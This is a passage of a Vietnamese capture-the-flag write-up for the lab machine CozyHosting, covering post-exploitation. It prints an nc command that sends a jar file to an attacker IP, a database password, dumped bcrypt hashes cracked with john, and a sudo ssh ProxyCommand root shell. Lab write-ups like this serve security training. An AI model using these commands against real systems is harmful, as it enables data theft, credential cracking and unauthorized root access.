uid=1001(app) gid=1001(app) groups=1001(app)
app@cozyhosting:/app$ 

Lưu ý: trong toàn bộ quá trình tạo RCE, nếu bị mất kết nối thì reload trang sessions để lấy sessiong mới của kanderson

SSH

app@cozyhosting:/tmp$ ls /home
ls /home
josh

Tôi có 1 user tên josh

app@cozyhosting:/app$ ls -la
ls -la
total 58856
drwxr-xr-x  2 root root     4096 Aug 14 14:11 .
drwxr-xr-x 19 root root     4096 Aug 14 14:11 ..
-rw-r--r--  1 root root 60259688 Aug 11 00:45 cloudhosting-0.0.1.jar

Lấy file jar này về và thử phân tích

app@cozyhosting:/app$ nc 10.10.14.65 1234 < cloudhosting-0.0.1.jar
nc 10.10.14.65 1234 < cloudhosting-0.0.1.jar
app@cozyhosting:/app$ 

┌──(root㉿kali)-[/home/kali]
└─# nc -lnvp 1234 > cloudhosting-0.0.1.jar
listening on [any] 1234 ...
connect to [10.10.14.65] from (UNKNOWN) [10.10.11.230] 33940

Sử dụng jadx để mở file jar này. Tôi tìm thấy thông tin đăng nhập vào database postgresql

postgresql

Quay lại RCE để đăng nhập db

app@cozyhosting:/tmp$ psql -h localhost -p 5432 -U postgres -d cozyhosting
psql -h localhost -p 5432 -U postgres -d cozyhosting
Password for user postgres: Vg&nvzAQ7XxR

Một lúc lục lọi thì tôi đã tìm được credentials

kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User 
admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

Dùng john để decrypt hash này

┌──(root㉿kali)-[~]
└─# john -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt --format=bcrypt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (admin)     
1g 0:00:00:08 DONE (2023-10-09 10:50) 0.1119g/s 322.5p/s 322.5c/s 322.5C/s mygirl..secrets
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Thử login ssh với user josh và password vừa decrypt được

┌──(root㉿kali)-[~]
└─# ssh josh@10.10.11.230
josh@10.10.11.230's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Oct  9 03:01:09 PM UTC 2023

  System load:           0.0
  Usage of /:            55.4% of 5.42GB
  Memory usage:          36%
  Swap usage:            0%
  Processes:             301
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.230
  IPv6 address for eth0: dead:beef::250:56ff:feb9:9679


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Oct  9 14:32:04 2023 from 10.10.14.106
josh@cozyhosting:~$ id
uid=1003(josh) gid=1003(josh) groups=1003(josh)
josh@cozyhosting:~$ 
josh@cozyhosting:~$ ls 
user.txt

Privilege escalation

josh@cozyhosting:~$ sudo -l
[sudo] password for josh: 
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *

Vào [ssh

GTFOBins](https://gtfobins.github.io/gtfobins/ssh/) và lấy quyền root với sudo

josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
# ls /root
root.txt

Reconnaissance and Scanning

Enumeration

sqlmap

john

Shell upload

User.txt

Privilege escalation

Reconnaissance and Scanning

Enumeration

SSH

Privilege escalation

Reconnaissance and Scanning

Enumeration

User Flag

Privilege Escalation

Reconnaissance and Scanning

Enumeration

User Flag

Privilege Escalation

Reconnaissance and Scanning

Enumeration

RCE

SSH

Privilege escalation

Pagination

Templates (for web app):

Error